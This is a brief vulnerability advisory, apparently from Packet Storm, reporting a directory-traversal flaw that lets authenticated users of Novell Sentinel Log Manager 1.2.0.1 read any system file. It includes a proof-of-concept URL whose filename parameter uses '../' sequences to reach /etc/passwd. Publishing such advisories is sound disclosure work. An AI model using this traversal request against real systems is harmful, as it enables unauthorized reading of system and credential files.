Novell Sentinel Log Manager 1.2.0.1 Directory Traversal

2011-12-18T00:00:00
ID PACKETSTORM:107974
Type packetstorm
Reporter Andrea Fabrizi
Modified 2011-12-18T00:00:00

Description

                                        
                                            `**************************************************************  
Vuln: Path Traversal  
Application: Sentinel Log Manager  
Vendor: Novell  
Version affected: <= 1.2.0.1  
Website: http://www.novell.com/products/sentinel-log-manager/  
Discovered By: Andrea Fabrizi  
Email: andrea.fabrizi@gmail.com  
Web: http://www.andreafabrizi.it  
**************************************************************  
  
The latest version of Sentinel Log Manager is prone to a Directory  
Traversal, which makes it possible, for Authenticated Users, to access  
any system file.  
  
Testing environment: Sentinel Log Manager Appliance 1.2.0.1  
  
Vulnerable URL:  
/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd  
  
`